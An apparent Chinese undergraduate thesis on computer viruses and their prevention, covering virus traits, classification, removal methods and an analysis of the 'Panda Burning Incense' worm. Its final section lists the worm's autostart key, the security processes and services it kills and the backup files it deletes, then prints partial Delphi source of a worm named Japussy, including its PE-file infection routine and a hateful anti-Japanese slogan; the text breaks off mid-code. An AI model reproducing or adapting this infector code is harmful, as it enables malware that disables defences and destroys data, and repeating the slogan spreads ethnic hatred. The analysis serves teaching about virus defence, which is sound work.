毕业设计（论文）计算机病毒解析与防范.doc

陕西师范大学网络教育学院毕业论文（设计）论文题目 计算机病毒解析与防范 姓 名 学 号 专 业 计算机科学与技术 批次/层次 指导教师 学习中心 目 录摘要.31 引言.32 正文.32.1 计算机病毒的概述.32.1.1 计算机病毒的定义.42.1.2 计算机病毒的特性.42.2 计算机病毒的分类.42.2.1 计算机病毒的基本分类.42.3 计算机病毒防范和清除的基本原则和技术.62.3.1 计算机病毒防范的概念和原则.62.3.2 计算机病毒防范基本技术.62.3.3 清除计算机病毒的基本方法. 62.4 典型计算机病毒的原理、防范和清除.62.4.1 引导区计算机病毒.72.4.2 文件型计算机病毒.72.4.3 脚本型计算机病毒.82.4.4 特洛伊木马计算机病毒.82.4.5 蠕虫计算机病毒.9 2.5 “熊猫烧香”病毒剖析.9 2.6 计算机主要检测技术和特点.263 参考资料.27 计算机病毒与防范 摘要目前计算机的应用遍及到社会的各个领域，同时计算机病毒也给我们带来了巨大的破坏和潜在的威胁，因此为了确保计算机能够安全工作，计算机病毒的防范工作，已经迫在眉睫。分析了计算机病毒的特点，讨论了主要从及时清除计算机病毒、局域网病毒的防范、加强计算机网络管理、个人用户的防范，这几个方面去进行计算机病毒的有效防范。关键词:计算机病毒 防范1 引言随着计算机在社会生活各个领域的广泛应用，计算机病毒攻击给我们的日常生活和工作中带来了很多的威胁，对于大多数计算机用户来说，谈到“计算机病毒”似乎觉得它深不可测，无法琢磨，其实计算机病毒是可以预防的，为了确保计算机使用的安全性，对计算机进行防范措施是很重要的，本文对此问题进行了探讨。2 正文 21计算机病毒的概述随着社会的不断进步，科学的不断发展，计算机病毒的种类也越来越多，但终究万变不离其宗！ 2.1.1计算机病毒的定义一般来讲，凡是能够引起计算机故障，能够破坏计算机中的资源（包括硬件和软件）的代码，统称为计算机病毒。而在我国也通过条例的形式给计算机病毒下了一个具有法律性、权威性的定义：“计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。” 2.1.2计算机病毒的特性 1、隐藏性与潜伏性 计算机病毒是一种具有很高编程技巧、短精悍的可执行程序。它通常内附在正常的程序中，用户启动程序同时也打开了病毒程序。计算机病毒程序经运行取得系统控制权， 可以在不到1秒钟的时间里传染几百个程序。而且在传染操作成后，计算机系统仍能运行，被感染的程序仍能执行，这就是计机病毒传染的隐蔽性计算机病毒的潜伏性则是指，某些编制巧的计算机病毒程序，进入系统之后可以在几周或者几个月甚至年内隐藏在合法文件中，对其它系统文件进行传染，而不被人发现。 2、传染性 计算机病毒可通过各种渠道(磁盘、共享目录、邮件)从已被感染的计算机扩散到其他机器上，感染其它用户在某情况下导致计算机工作失常。3、表现性和破坏性任何计算机病毒都会对机器产生一定程的影响，轻者占用系统资源，导致系统运行速度大幅降低重者除文件和数据，导致系统崩溃。4、可触发性病毒 具有预定的触发条件，可能是时间、日期、文类型或某些特定数据等。一旦满足触发条件，便启动感染或破坏作，使病毒进行感染或攻击；如不满足，继续潜伏。有些病毒针对特定的操作系统或特定的计算机。5、欺骗性和持久性计算机病毒行动诡秘，计算机对其反应迟，往往把病毒造成的错误当成事实接受下来。病毒程序即使被发，已被破坏的数据和程序以及操作系统都难以恢复。在网络操作情况下，由于病毒程序由一个受感染的拷贝通过网络系统反复传，病毒程序的清除愈加复杂。 除了上述五点外，计算机病毒还具有不可预见性、衍生性、针对性、等特点。正是由于计算机病毒具有这些特点，给计算机病毒的预防、检测与清除工作带来了很大的难度。 2.2计算机病毒的分类 2.2.1计算机病毒的基本分类1、传统开机型计算机病毒纯粹的开机型计算机病毒多利用软盘开机时侵入计算机系统，然后再伺机感染其他的软盘或者硬盘，例如：“Stoned 3”（米开朗基罗）。2、隐形开机型计算机病毒 此类计算机病毒感染的系统，再行检查开机区，得到的将是正常的磁区资料，就好像没有中毒一样，此类计算机病毒不容易被杀毒软件所查杀，而防毒软件对于未知的此类型计算机病毒，必须具有辨认磁区资料真伪的能力。此类计算机病毒已出现的尚有“Fish”. 3、档案感染型兼开机型计算机病毒 档案感染型兼开机型计算机病毒时利用档案感染时司机感染开机区，因而具有双中的行动能力，此类型较著名的计算机病毒有“Cancer”。4、目录型计算机病毒本类型计算机病毒的感染方式非常独特，“Dir2”即其代表，此类计算机病毒仅修改目录区（Root），便可达到其感染目的。 5、传统档案型计算机病毒传统档案型计算机病毒最大的特征，便是将计算机病毒本身植入档案，使档案膨胀，以达到散播传染的目的。代表有“13 Firday”。6、千面人计算机病毒 千面人计算机病毒是指具有自我编码能力的计算机病毒，“1701 下雨”等，为这种类型主要代表，此种计算机病毒编码的目的，是使其感染的每一个档案，看起来皆不一样，干扰杀毒软件的侦测，不过千面人计算机病毒仍会留下的这个“小辫子”，将其绳之以法。 7、突变引擎病毒有鉴于前面人计算机病毒一个接一个被截获，边有人编写出一种突变式计算机病毒，使原本千面人计算机病毒无法解决的程序开头相同的问题得到克服，并编写成OBJ副程序，供他人植草此类计算机病毒，即 Mctation engine。尽管如此，这类计算机病毒仅干扰了扫毒式软件，对其他方式的防毒软件并没有太大的影响。8、隐形档案型计算机病毒 此类病毒可以避开去多防毒软件，因为隐形计算机病毒能直接植入DOS系统的作业环境中，当外部程序呼叫DOS中断服务时，便同时执行到计算机病毒本身，使得计算机病毒能从容地将受其感染的档案，粉饰成正常无毒的样子。此类计算机病毒有“4096” 等。 9、终结型计算机病毒 终结性计算机病毒能追踪磁盘操作终端的原始进入点，当计算机病毒取得磁盘原始中断时，便可任意再磁盘上修改资料或普哦坏资料，而不会惊动防毒程序，这就是说，装有防毒程序和美妆防毒程序的情况是一样的危险。这类计算机病毒有的采用INT 1单步执行的方式，逐步追踪磁盘中断的过程，找出BIOS磁盘中断的部分，供计算机病毒内部使用；有的采用死机的方式，记录几个BIOS版本的磁盘中断原始进入点，当计算机病毒遭到熟悉的BIOS版本，便可直接呼叫磁盘中断，对磁盘予取予求；有的则分析磁盘中断的程序片段，找出BIOS中的相似部分便可直接呼叫磁盘中断。其代表有“Hammer 6”等。 10、Word巨集计算机病毒 Word 巨集计算机病毒可以说时目前最新的计算机病毒种类了，它是文件型计算机病毒，异于以往以感染磁盘区或可执行的档案为主的计算机病毒，此类病毒时利用Word 提供的巨集功能来感染文件。目前已经在Internet及BBS网络中发现不少Word巨集计算机病毒，而且此类计算机病毒是用类似Basic程序编写出来的，易学，其反战速度一定很快。 2.3计算机病毒防范和清除的基本原则和技术 2.3.1计算机病毒防范的概念和原则计算机病毒防范，是指通过建立合理的计算机病毒防范体系和制度，即使发现计算机病毒入侵，并采取有效的手段阻止计算机病毒的传播和破坏，回复受影响的计算机系统和数据。原则以防御计算机病毒为主动，主要表现在检测行为的动态性和防范方法的广谱性。2.3.2计算机病毒防范基本技术 计算机病毒预防是在计算机病毒尚未入侵或刚刚入侵，就拦截、阻击计算机病毒的入侵或立即警报。目前在预防计算机病毒工具中采用的主要技术如下： 2.3.3清除计算机病毒的基本方法 1.简单的工具治疗简单工具治疗是指使用Debug等简单的工具，借助检测者对某种计算机病毒的具体知识，从感染计算机病毒的软件中摘除计算机代码。但是，这种方法同样对检测者自身的专业素质要求较高，而且治疗效率也较低。 2.专用工具治疗使用专用工具治疗被感染的程序时通常使用的治疗方法。专用计算机治疗工具，根据对计算机病毒特征的记录，自动清除感染程序中的计算机病毒代码，使之得以恢复。使用专用工具治疗计算机病毒时，治疗操作简单、高效。从探索与计算机病毒对刚的全过程来看，专用工具的开发商也是先从使用简单工具进行治疗开始，当治疗获得成功后，再研制相应的软件产品，使计算机自动地完成全部治疗操作。 2.4 典型计算机病毒的原理、防范和清除 2.4.1引导区计算机病毒系统引导区时在系统引导的时候，进入到系统中，获得对系统的控制权，在完成其自身的安装后才去引导系统的。称其为引导区计算机病毒时因为这类计算机病毒一般是都侵占系统硬盘的主引导扇区I/O分区的引导扇区，对于软盘则侵占了软盘的引导扇区。它会感染在该系统中进行读写操作的所有软盘，然后再由这些软盘以复制的方式和引导进入到其他计算机系统，感染其他计算机的操作系统。如何检测呢？1. 查看系统内存的总量与正常情况进行比较2. 检查系统内存高端的内容3. 检查系统的INT 13H中断向量4. 检查硬盘的主引导扇区、DOS分区引导扇区以及软盘的引导扇区清除：用原来正常的分区表信息或引导扇区信息，覆盖掉计算机病毒程序。此时，如果用户事先提取并保存了自己硬盘中分区表的信息和DOS分区引导扇区信息，那么，恢复工作变得非常简单。可以直接用Debug将这两种引导扇区的内容分别调入内存，然后分别回它的原来位置，这样就消除了计算机病毒。 2.4.2文件型计算机病毒文件型计算机病毒程序都是依附在系统可执行文件或覆盖文件上，当文件装入系统执行的时候，引导计算机病毒程序也进入到系统中。只有极少计算机病毒程序感染数据文件。此类病毒感染对象大多是系统的可执行文件，也有一些还要对覆盖文件进行传染，而对数据进行传染的则少见。清除：1. 确定计算机病毒程序的位置，是驻留在文件尾部还是在文件首部。2. 找到计算机病毒程序的首部位置（对应于在文件尾部驻留方式），或者尾部位置（对应于在文件首部驻留方式）。3. 恢复原文件头部的参数。4. 修改文件长度，将源文件写回。2.4.3脚本型计算机病毒主要采用脚本语言设计的病毒称其为脚本病毒。实际上在早期的系统中，计算机病毒就已经开始利用脚本进行传播和破坏，不过专门的脚本病毒并不常见。但是在脚本应用无所不在的今天，脚本病毒却成为危害最大，最为广泛的病毒，特别是当他和一些传统的恶性病毒相结合时，其危害就更为严重了。其主要有两种类型，纯脚本型，混合型。它的特点：l 编写简单l 破坏力大l 感染力强l 传播范围大（多通过E-mail，局域网共享，感染网页文件的方式传播）l 计算机病毒源码容易被获取，变种多l 欺骗性强l 使得计算机病毒生产机事先起来非常容易清除：l 禁用文件系统对象FileSystemObjectl 卸载Windows Scripting Hostl 删除vbs，vbe，js，jse文件后缀与应用程序映射l 在Windows目录中，找到WScript.exe，更改名称或者删除l 要彻底防止vbs网络蠕虫病毒，还需要设置一下浏览器l 禁止OE的自动收发电子邮件功能l 显示所有文件类型的扩展名称l 将系统的网络连接的安全级别设置至少为“中等” 2.4.4特洛伊木马计算机病毒特洛伊木马也叫黑客程序或后门病毒，是指吟唱在正常程序中的一段具有特殊功能的程序，其隐蔽性及好，不易察觉，是一种极为危险的网络攻击手段。 其第一代：伪装性病毒，第二代：AIDS型木马，第三代：网络传播性木马如何检查？l 稽查注册表l 检查你的系统配置文件l 清除：l 备份重要数据l 立即关闭身背电源l 备份木马入侵现场l 修复木马危害 2.4.5 蠕虫计算机病毒蠕虫是一种通过网络传播的恶性计算机病毒，它具有计算机病毒的一些共性，如传播性、隐蔽性、破坏性等。同时自己有自己一些特征，如利用文件寄生，对网络造成拒绝服务以及和黑客技术相结合等。简单点说，蠕虫就是使用危害的代码来攻击网络上的受害主机，并在受害主机上自我复制，再攻击其他的受害主机的计算机病毒。其特征：l 自我繁殖l 利用软件漏洞l 造成网络拥堵l 消耗系统资源l 留下安全隐患清除：l 与防火墙互动l 交换机联动l 通知HIDS（基于主机的入侵检测）l 报警 2.5 “熊猫烧香”病毒剖析 “熊猫烧香”病毒感染机理:“熊猫烧香”，是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。 1:拷贝文件病毒运行后,会把自己拷贝到C:WINDOWSSystem32Driversspoclsv.exe 2:添加注册表自启动病毒会添加自启动项HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun svcshare -> C:WINDOWSSystem32Driversspoclsv.exe 3:病毒行为a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序： QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword，并使用的键盘映射的方法关闭安全软件IceSword。添加注册表使自己自启动HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun svcshare -> C:WINDOWSSystem32Driversspoclsv.exe并中止系统中以下的进程: Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe。b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享，共存在的话就运行net share命令关闭admin$共享。c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享，共存在的话就运行net share命令关闭admin$共享。d:每隔6秒删除安全软件在注册表中的键值。并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL CheckedValue -> 0x00 删除以下服务: navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc。e:感染文件 病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部，并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址，用户一但打开了该文件，IE就会不断的在后台点击写入的网址，达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件： WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone 。g:删除文件 病毒会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。 “熊猫烧香”病毒核心源码用 Delphi 写 program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI, Registry; const HeaderSize = 82432; /病毒体的大小 IconOffset = $12EB8; /PE文件主图标的偏移量 /在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同 /查找2800000020的十六进制字符串可以找到主图标的偏移量 HeaderSize = 38912; /Upx压缩过病毒体的大小 IconOffset = $92BC; /Upx压缩过PE文件主图标的偏移量 /Upx 1.24W 用法: upx -9 -8086 Japussy.exe IconSize = $2E8; /PE文件主图标的大小-744字节 IconTail = IconOffset + IconSize; /PE文件主图标的尾部 ID = $44444444; /感染标记 /垃圾码，以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '* W32.Japussy.Worm.A *' $R *.RES Function RegisterServiceProcess()function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll' /函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; /日文操作系统标记 判断是否为Win9x Function IsWin9x()function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then /Win9x Result := True; end; 在流之间复制 procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; 将宿主文件从已感染的PE文件中分离出来，以备使用 procedure ExtractFile(FileName: string); var sStream, dStream: TFileStream; begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); /跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end; end; 填充STARTUPINFO结构 procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; 发带毒邮件 procedure SendMail; begin /哪位仁兄愿意完成之？ end; 感染PE文件 procedure InfectOneFile(FileName: string); var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array0.1 of Char; begin try /出错则文件正在被使用，退出 if CompareText(FileName, 'JAPUSSY.EXE') = 0 then /是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do /检查PE文件头 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf0 = #80) and (Buf1 = #69) then /PE标记 begin IsPE := True; /是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); /检查感染标记 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size < 10240) then /太小的文件不感染 Infected := True; finally SrcStream.Free; end; if Infected or (not IsPE) then /如果感染过了或不是PE文件则退出 Exit; IcoStream := TMemoryStream.Create; DstStream := TMemoryStream.Create; try aIcon := TIcon.Create; try /得到被感染文件的主图标(744字节)，存入流 aIcon.ReleaseHandle; aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); aIcon.SaveToStream(IcoStream); finally aIcon.Free; end; SrcStream := TFileStream.Create(FileName, fmOpenRead); /头文件 HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try /写入病毒体主图标之前的数据 CopyStream(HdrStream, 0, DstStream, 0, IconOffset); /写入目前程序的主图标 CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); /写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream, IconTail, DstSt